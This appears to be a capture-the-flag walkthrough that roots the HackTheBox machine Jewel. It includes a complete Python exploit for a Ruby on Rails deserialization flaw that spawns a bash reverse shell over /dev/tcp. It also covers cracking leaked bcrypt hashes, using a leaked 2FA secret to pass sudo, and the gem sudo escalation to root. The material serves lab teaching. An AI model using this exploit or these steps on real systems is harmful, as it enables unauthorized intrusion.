Jewel HackTheBox WalkThrough


This is the Jewel HackTheBox machine walkthrough. In this write-up I demonstrate step by step how I rooted the Jewel HTB machine. Before starting, a few facts about the machine: it is a Linux box with IP address 10.10.10.211 and a difficulty of Medium as assigned by its maker.

First of all, connect your PC to the VPN and confirm connectivity to the Jewel machine by pinging its IP 10.10.10.211. If all goes well, it is time to start hacking. As usual, I began by scanning the machine. Scanning gives an idea of how to proceed: it helps with banner grabbing the services running on the different ports, and sometimes with vulnerability scanning as well. I used nmap for this task and the result is given below:

Scanning

$ sudo nmap -sC -sV -oN jewel_scan.nmap 10.10.10.211

nmap report of the jewel machine

Nmap revealed that ports 22, 8000 and 8080 are open: SSH on port 22, Apache2 on port 8000 and the nginx web server on port 8080. The nmap script http-generator showed that the site on port 8000 uses the gitweb 2.20.1 interface. Since Apache2 is listening on port 8000 there will be a website at http://10.10.10.211:8000, and since nginx is listening on port 8080 there will be another at http://10.10.10.211:8080.

I began by enumerating port 8000, because websites have a larger attack surface. I searched searchsploit for gitweb 2.20.1 exploits but found none. On visiting https://10.10.10.211:8000 I was redirected to http://10.10.10.211:8000/gitweb/. After some enumeration I found a file named bd.sql at http://10.10.10.211:8000/gitweb/?p=.git;a=blob;f=bd.sql;h=a7fddb693ca735f8aa1e4b09046cec2adddddc51;hb=HEAD. Password hashes of the users bill and jennifer are present in this file. I saved them to a file to crack with john and rockyou.txt. The extracted hashes are:

$2a$12$uhUssB8.HFpT4XpbhclQU.Oizufehl9qqKtmdxTXetojn2FcNncJW

$2a$12$ik.0o.TGRwMgUmyOR.Djzuyb/hjisgk2vws1xYC/hxw8M1nFk0MQy

Hash found in the file bd.sql

Searched online for the type of this hash and learned that it is a bcrypt hash.

Identifying Hash Type

Identifying hashes online in Jewel Hackthebox machine

Then I tried to crack them with john, but neither of them cracked. After further enumeration I could not find any way into the Jewel machine, so I moved on to enumerate port 8080. Nmap listed the service as Phusion Passenger 6.0.6, so I searched searchsploit for exploits for it, but again found nothing. Going to http://10.10.10.211:8080/login I found a login page. Tried some basic SQL injection, but it is not vulnerable. There is also a signup page, so I registered an account with the credentials:

 Username : test1

 Email    : [email protected]

 Password : test1

After logging in with the credentials [email protected] : test1, under the profile menu I tested the username field for some injection attacks (because it is the only field we can manipulate) but had no success. Up to this point I had not found any potential vector into the Jewel machine.

After getting a hint from the HTB forum and the internet, I found that the web server is using Ruby on Rails, and versions before 5.2.4.3 are vulnerable to a deserialization attack. The current versions of Ruby and Ruby on Rails can be found in the commit at http://10.10.10.211:8000/gitweb/?p=.git;a=commitdiff;h=5d6f436256c9575fbc7b1fb9621b18f0f8656741

Version file of gem and ruby on jewel hackthebox machine

The working PoC can be found on GitHub, and more information about this vulnerability can be found on the Google Forum.
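The finding above is purely version-based, so the defender-side check is to read the pinned Rails version out of the repository's Gemfile.lock and compare it with the fixed release. The following is an added example, not code from the write-up or the PoC; it assumes the repo pins Rails in a Gemfile.lock as Rails apps normally do, and the lockfile excerpt is constructed, not the contents of the Jewel repo.

```python
import re

# Rails releases that closed the deserialization bug discussed above.
# 5.2.4.3 is the version the write-up names; 6.0.3.1 is the matching
# fix on the 6.0 branch from the same release set.
FIXED_VERSIONS = {"5.2": (5, 2, 4, 3), "6.0": (6, 0, 3, 1)}

# Constructed Gemfile.lock excerpt (not the real Jewel lockfile).
SAMPLE_LOCK = """\
GEM
  remote: https://rubygems.org/
  specs:
    actionpack (5.2.2.1)
    rails (5.2.2.1)
      actioncable (= 5.2.2.1)
    railties (5.2.2.1)
"""


def parse_version(version: str) -> tuple:
    """'5.2.4.3' -> (5, 2, 4, 3) so versions compare numerically, not as strings."""
    return tuple(int(part) for part in version.split("."))


def rails_version(lockfile: str):
    """Return the pinned rails version from a Gemfile.lock, or None if absent.

    Only the 4-space-indented spec line counts; deeper '(= x.y.z)' lines are
    dependency constraints of other gems, not the installed version.
    """
    match = re.search(r"^ {4}rails \(([\d.]+)\)", lockfile, re.MULTILINE)
    return match.group(1) if match else None


def is_vulnerable(version: str) -> bool:
    """True when the version predates the fix for its branch."""
    parts = parse_version(version)
    branch = f"{parts[0]}.{parts[1]}"
    fixed = FIXED_VERSIONS.get(branch)
    if fixed is None:
        # No entry: anything older than the 5.2 fix never received one,
        # anything newer (6.1+) was released after it.
        return parts < FIXED_VERSIONS["5.2"]
    return parts < fixed


if __name__ == "__main__":
    found = rails_version(SAMPLE_LOCK)
    print(f"rails {found}: {'VULNERABLE' if is_vulnerable(found) else 'patched'}")
```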

You can follow the steps given in the GitHub PoC. I tried to exploit this vulnerability using that method and could easily exploit it as described there. For simplicity, @randomname83 has created a Python script to get a user shell. All you have to do is copy the script into a file named rev.py, start a netcat listener, and run the script as shown in the screenshot. The script is:

import re
import sys

import requests

# Usage: python3 rev.py <target IP> <your IP> <your port>
# (the check must run before sys.argv[1] is used below)
if len(sys.argv) != 4:
    print("specify target IP, your IP and port: python3 rev.py 10.10.xx.xx 10.10.xx.xx 9001")
    sys.exit(1)

URL = 'http://{}:8080'.format(sys.argv[1])
username = 'myuser4'
password = 'mypass4'
email = '[email protected]'

s = requests.Session()

# fetch the CSRF token from the signup page; the same session token is
# accepted for the later form posts
resp = s.get(URL + '/signup')
rx = r'token" content="(.*)"'

token = re.search(rx, resp.text).group(1)

# create user
data = {}
data['utf8'] = '✓'  # Rails form marker (a checkmark, garbled to 'â' in the original paste)
data['authenticity_token'] = token
data['user[username]'] = username
data['user[email]'] = email
data['user[password]'] = password
data['commit'] = 'Create User'
resp = s.post(URL + '/users', data=data)

# login
data = {}
data['utf8'] = '✓'
data['authenticity_token'] = token
data['session[email]'] = email
data['session[password]'] = password
data['commit'] = 'Log in'
resp = s.post(URL + '/login', data=data)

# the profile link on the landing page carries our numeric user id
rx = r'href="/users/(.*)"'
user_id = re.search(rx, resp.text).group(1)

# rev shell
rev = "bash -c 'bash -i >& /dev/tcp/{}/{} 0>&1'".format(sys.argv[2], sys.argv[3])
# serialized payload from the PoC, carried in the username field
payload = '\x04\x08o\x3A\x40ActiveSupport\x3A\x3ADeprecation\x3A\x3ADeprecatedInstanceVariableProxy'
payload += '\x09\x3A\x0E\x40instanceo\x3A\x08ERB\x08\x3A\x09\x40srcI\x22'
payload += '{}\x60{}\x60'.format(chr(len(rev)+7), rev)
payload += '\x06\x3A\x06ET\x3A\x0E\x40filenameI\x22\x061\x06\x3B\x09T\x3A\x0C\x40linenoi\x06\x3A\x0C\x40method\x3A'
payload += '\x0Bresult\x3A\x09\x40varI\x22\x0C\x40result\x06\x3B\x09T\x3A\x10\x40deprecatorIu\x3A\x1F'
payload += 'ActiveSupport\x3A\x3ADeprecation\x00\x06\x3B\x09T'

# update the profile with the payload as username (the PoC submits it twice)
data = {}
data['utf8'] = '✓'
data['authenticity_token'] = token
data['_method'] = 'patch'
data['user[username]'] = payload
data['commit'] = 'Update User'
s.post(URL + '/users/' + user_id, data=data)
s.post(URL + '/users/' + user_id, data=data)

# trigger the payload
s.get(URL + '/articles')

Getting User Shell

$ python3 rev.py 10.10.10.211 10.10.14.19 1234

$ nc -nvlp 1234

$ id && whoami

Getting user shell during Jewel Hackthebox walkthrough

We got a shell. Let us upgrade it to a fully interactive Linux shell so that we can run commands that need a terminal.

Upgrading Shell

$ python3 -c 'import pty;pty.spawn("/bin/bash")'

$ export TERM=xterm

Upgrading the shell in Jewel Hackthebox machine after getting user shell

We have upgraded our shell. Let us capture User Flag.

Capture User Flag

$ cat user.txt

User flag found during Jewel Hackthebox walkthrough

Privilege Escalation

To escalate privileges to root we first have to find a privilege escalation vector. During initial enumeration I ran sudo -l to check whether user bill has any special privileges, but it requires a password. Then I ran linpeas.sh (a post-exploitation enumeration script) to look for a vector. Linpeas found two password hashes in the files dump_2020-08-27.sql and bd.sql, located in /var/backups/ and /home/bill/blog/ respectively. The hashes are:

jennifer : $2a$12$sZac9R2VSQYjOcBTTUYy6.Zd5I02OnmkKnD3zA6MqMrzLKz0jeDO

Unknown : $2a$12$uhUssB8.HFpT4XpbhclQU.Oizufehl9qqKtmdxTXetojn2FcNncJW

On listing the content of the file dump_2020-08-27.sql I got another hash, this one for user bill:

bill: $2a$12$QqfetsTSBVxMXpnTR.JfUeJXcJRHv5D5HImL0EHI7OzVomCrqlRxW 

We now have three hashes to crack. One belongs to user jennifer, who does not exist on the system, and the owner of the second is unknown. So we are left with the hash of bill.

Linpeas enumerated the hashes from the backup directory

Tried to crack it using john, and it cracked easily.

Cracking Hash

$ vi creds.hash

$ sudo john --format=bcrypt creds.hash --wordlist=/usr/share/wordlists/rockyou.txt

$ sudo john creds.hash --show

Running john to crack hashes

John successfully cracked the hash and the credential is bill : spongebob. I ran sudo -l again to check for any special privileges given to user bill; after entering the password it asked for a Verification Code. It appears that some two-factor authentication is enabled for normal users running sudo -l. After some more enumeration I found a hidden file named google_authenticator inside the home directory. It contains the secret 2UQI3R52WFCLE6JTLDCSJYMJH4, which can be used to generate OTPs. I used the Authenticator add-on for Firefox to generate an OTP from this secret key.

Google authenticator content in home directory of jewel htb machine

Installed the Authenticator add-on by just clicking this Firefox URL.

Firefox authenticator addon

After installing the add-on, click + > Manual Entry > Issuer: Anything & Secret: 2UQI3R52WFCLE6JTLDCSJYMJH4 > OK

Copy the OTP, run sudo -l, enter the password spongebob, then enter the OTP as the Verification code.

$ sudo -l

~spongebob

~622463   

Running sudo -l command on Jewel Hackthebox machine to see privilege to other user

So sudo -l revealed that user bill can run the gem binary with sudo as any user. If you get output like (ALL : ALL) /usr/bin/gem, the best place to look for the exploit is GTFOBins (remember this). At that URL you can find the technique to escalate privileges.

Gtfobin gem binary exploit
Img-Src:gtfobins.github.io

Finding PrivEsc Vector

So here our privilege escalation vector is sudo rights exploitation. Let us get a root shell and capture the root flag.

Getting Root Shell

$ sudo gem open -e "/bin/sh -c /bin/sh" rdoc

# whoami && id

Privilege escalation in Jewel Hackthebox machine

Capture Root Flag 

# cat /root/root.txt

Root Flag captured during Jewel Hackthebox walkthrough

This is how I rooted the Jewel HackTheBox machine. I learnt a lot during this challenge and hope you have learnt something new too. Thanks for reading this walkthrough. Share your experience in the comment section. If you want to give any suggestion about the write-up, feel free to write to us at [email protected].


Deepak Kumar Maurya

Hi everyone, I am Deepak Kumar Maurya, creator of Ethicalhacs.com. I am an InfoSec Consultant by day and a Bug Bounty Hunter & CTF player by night. I sometimes write walkthroughs and other cyber security articles here. You can connect with me at https://www.linkedin.com/in/deepakdkm/